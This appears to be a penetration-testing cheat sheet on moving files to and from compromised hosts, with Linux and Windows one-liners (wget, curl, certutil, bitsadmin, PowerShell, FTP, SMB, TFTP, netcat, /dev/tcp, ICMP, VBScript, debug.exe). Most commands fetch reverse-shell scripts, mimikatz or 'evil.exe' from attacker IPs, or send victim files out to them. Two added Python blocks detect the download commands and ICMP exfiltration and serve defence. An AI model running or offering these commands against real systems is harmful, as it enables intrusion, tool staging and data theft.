Exfiltration
Copy&Paste Base64
Linux
base64 -w0 <file>
base64 -d file
Windows
certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll
HTTP
Linux
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
fetch 10.10.14.14:8000/shell.py
Windows
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
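A detector for the download and encoding one-liners listed in the Base64 and Windows HTTP sections above, added here as an example that is not part of the original page: a handful of regex rules run over constructed process-creation events. The event shape (a dict with pid and CommandLine) is an assumption, loosely modelled on a Sysmon process-creation record.

```python
import re

# Detection rules keyed to the download/encoding one-liners shown on this page.
# Each entry: (label, regex over the command line). Matching is case-insensitive,
# so "CERTUTIL -UrlCache" fires as well as the lower-case form.
RULES = [
    ("certutil download", r"certutil(\.exe)?\b.*\s-urlcache\b.*\s-f\b"),
    ("certutil base64 transform", r"certutil(\.exe)?\b.*\s-(en|de)code\b"),
    ("bitsadmin transfer", r"bitsadmin(\.exe)?\b.*\s/transfer\b"),
    ("BITS PowerShell transfer", r"\bStart-BitsTransfer\b"),
    ("WebClient download", r"Net\.WebClient\b.*\.Download(File|String)\("),
    ("Invoke-WebRequest to disk", r"\b(Invoke-WebRequest|iwr|wget|curl)\b.*\s-OutFile\b"),
]
COMPILED = [(label, re.compile(pattern, re.IGNORECASE)) for label, pattern in RULES]

def match_rules(command_line):
    """Return the labels of every rule that fires on one command line."""
    return [label for label, rx in COMPILED if rx.search(command_line)]

def scan_events(events):
    """events: iterable of dicts with at least 'pid' and 'CommandLine' (assumed shape).
    Returns [(pid, label), ...] for every hit, in event order then rule order."""
    hits = []
    for ev in events:
        for label in match_rules(ev.get("CommandLine", "")):
            hits.append((ev["pid"], label))
    return hits

# Constructed sample events; the flagged command lines are the ones this page lists.
SAMPLE_EVENTS = [
    {"pid": 101, "CommandLine": "certutil -urlcache -split -f http://webserver/payload.b64 payload.b64"},
    {"pid": 102, "CommandLine": "certutil -decode payload.b64 payload.dll"},
    {"pid": 103, "CommandLine": "bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\\downloads\\examplefile.pdf"},
    {"pid": 104, "CommandLine": "powershell -c \"(New-Object Net.WebClient).DownloadFile('http://10.10.14.2:80/taskkill.exe','C:\\Windows\\Temp\\taskkill.exe')\""},
    {"pid": 105, "CommandLine": "powershell Invoke-WebRequest \"http://10.10.14.2:80/taskkill.exe\" -OutFile \"taskkill.exe\""},
    {"pid": 106, "CommandLine": "certutil -verify -urlfetch cert.cer"},   # benign certutil use, must not fire
    {"pid": 107, "CommandLine": "powershell Start-BitsTransfer -Source $url -Destination $output"},
    {"pid": 108, "CommandLine": "notepad.exe C:\\Users\\a\\notes.txt"},
]

if __name__ == "__main__":
    for pid, label in scan_events(SAMPLE_EVENTS):
        print(pid, label)
```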
Upload files
SimpleHttpServerWithFileUploads
HTTPS Server
import http.server
import ssl

# Python 3 version of the original Python 2 snippet (BaseHTTPServer / ssl.wrap_socket):
# serve the current directory over HTTPS on port 443 using ./server.pem (certificate and key in one file)
httpd = http.server.HTTPServer(('0.0.0.0', 443), http.server.SimpleHTTPRequestHandler)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(certfile='./server.pem')
httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()
FTP
FTP server (python)
pip3 install pyftpdlib
python3 -m pyftpdlib -p 21
FTP server (NodeJS)
sudo npm install -g ftp-srv --save
ftp-srv ftp://0.0.0.0:9876 --root /tmp
FTP server (pure-ftp)
apt-get update && apt-get install pure-ftpd
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd fusr -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
Windows client
echo open 10.11.0.41 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -v -s:ftp.txt
SMB
Kali as server
kali_op1> impacket-smbserver -smb2support kali `pwd`
kali_op2> smbserver.py -smb2support name /path/folder
impacket-smbserver -smb2support -user test -password test test `pwd`
Or create an SMB share using Samba:
apt-get install samba
mkdir /tmp/smb
chmod 777 /tmp/smb
Add this share definition to /etc/samba/smb.conf:
[public]
    comment = Samba on Ubuntu
    path = /tmp/smb
    read only = no
    browsable = yes
    guest ok = Yes
Then restart the service:
service smbd restart
Windows
CMD-Wind> \\10.10.14.14\path\to\exe
CMD-Wind> net use z: \\10.10.14.14\test /user:test test
WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
WindPS-2> cd new_disk:
SCP
The attacker has to have SSHd running.
scp <username>@<Attacker_IP>:<directory>/<filename> <local_destination>
NC
nc -lvnp 4444 > new_file
nc -vn <IP> 4444 < exfil_file
/dev/tcp
Download file from victim
Attacker> nc -lvnp 80 > file
Victim> cat /path/file > /dev/tcp/10.10.10.10/80
Upload file to victim
Attacker> nc -w5 -lvnp 4444 < file_to_send.txt
Victim> exec 6< /dev/tcp/10.10.10.10/4444
Victim> cat <&6 > file.txt
(The listener port and the port in the /dev/tcp path must match.)
thanks to @BinaryShadow_
ICMP
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
from scapy.all import *

def process_packet(pkt):
    if pkt.haslayer(ICMP):
        if pkt[ICMP].type == 0:
            data = pkt[ICMP].load[-4:]
            print(f"{data.decode('utf-8')}", flush=True, end="")

sniff(iface="tun0", prn=process_packet)
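The ICMP channel above as a defender meets it in a capture, added here as an example that is not from the original page: a raw IPv4/ICMP parser that separates stock ping payloads from the repeating pattern that ping -p produces, and reassembles the trailing 4-byte units (the chunk size xxd -c 4 gives) for analysis. The sample frames are constructed; the stock-payload fillers (iputils/BSD counter bytes after the timestamp slot, the Windows alphabet) are stated as assumptions.

```python
import struct

# Constructed sample traffic: minimal IPv4 + ICMP echo frames (checksums left at 0,
# which is fine for an offline parser that never validates them).
def build_echo(payload, icmp_type=8):
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28 + len(payload), 0, 0, 64, 1, 0,
                     bytes([10, 10, 10, 1]), bytes([10, 10, 10, 2]))
    return ip + struct.pack("!BBHHH", icmp_type, 0, 0, 1, 1) + payload

def parse_icmp_echo(frame):
    """Return (icmp_type, data) for an ICMP echo request/reply, else None."""
    ihl = (frame[0] & 0x0F) * 4
    if len(frame) < ihl + 8 or frame[9] != 1:          # IP protocol 1 == ICMP
        return None
    icmp_type = frame[ihl]
    return (icmp_type, bytes(frame[ihl + 8:])) if icmp_type in (0, 8) else None

def is_default_filler(data):
    """Stock ping payloads (assumed defaults): iputils/BSD fill data[k] == k after the
    timestamp slot; Windows ping sends the repeating alphabet."""
    if data == b"abcdefghijklmnopqrstuvwabcdefghi":
        return True
    return len(data) > 16 and all(data[k] == k & 0xFF for k in range(16, len(data)))

def looks_patterned(data, max_period=16):
    """ping -p repeats a unit of at most 16 bytes across the data area; detect that
    period in the bytes after the 16-byte timestamp slot (heuristic: a legitimate
    'ping -p ff' is flagged too)."""
    tail = data[16:]
    for p in range(1, max_period + 1):
        if 2 * p <= len(tail) and all(tail[i] == tail[i - p] for i in range(p, len(tail))):
            return True
    return False

def triage(frames, chunk=4):
    """Flag echo requests with a patterned, non-default payload and reassemble the
    trailing `chunk` bytes of each for the analyst. Returns (alert indices, bytes)."""
    alerts, recovered = [], bytearray()
    for n, frame in enumerate(frames):
        parsed = parse_icmp_echo(frame)
        if parsed is None or parsed[0] != 8 or is_default_filler(parsed[1]):
            continue
        if looks_patterned(parsed[1]):
            alerts.append(n)
            recovered += parsed[1][-chunk:]
    return alerts, bytes(recovered)

TS = bytes(16)                                          # timestamp slot, zeroed in the sample
SAMPLE_FRAMES = [
    build_echo(TS + bytes(range(16, 56))),              # stock Linux ping, 56 data bytes
    build_echo(b"abcdefghijklmnopqrstuvwabcdefghi"),    # stock Windows ping
] + [build_echo(TS + unit * 10) for unit in (b"hell", b"o wo", b"rld!")]  # ping -p style

if __name__ == "__main__":
    print(triage(SAMPLE_FRAMES))                        # ([2, 3, 4], b'hello world!')
```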
SMTP
If you can send data to an SMTP server, you can create an SMTP server that receives the data with Python:
sudo python -m smtpd -n -c DebuggingServer :25
TFTP
The TFTP client is present by default on Windows XP and 2003 (on other versions it needs to be explicitly added during installation).
In Kali, start TFTP server:
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /path/to/nc.exe /tftp
TFTP server in python:
pip install ptftpd
ptftpd -p 69 tap0 .
In victim, connect to the Kali server:
tftp -i <KALI-IP> get nc.exe
PHP
Download a file with a PHP oneliner:
VBScript
Attacker> python -m SimpleHTTPServer 80
Victim
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
Debug.exe
This is a crazy technique that works on 32-bit Windows machines. The idea is to use the debug.exe program, which is meant for inspecting binaries, like a debugger, but can also rebuild them from hex. So we take a binary, like netcat, dump it to hex, paste the text into a file on the compromised machine, and then assemble it back into an executable with debug.exe.
Debug.exe can only assemble 64 kb, so we need to use files smaller than that. We can use upx to compress the binary even further. So let's do that:
Now it only weighs 29 kb. Perfect. Now let's convert it to hex:
wine exe2bat.exe nc.exe nc.txt
Now we just copy-paste the text into our Windows shell, and it will automatically create a file called nc.exe.
DNS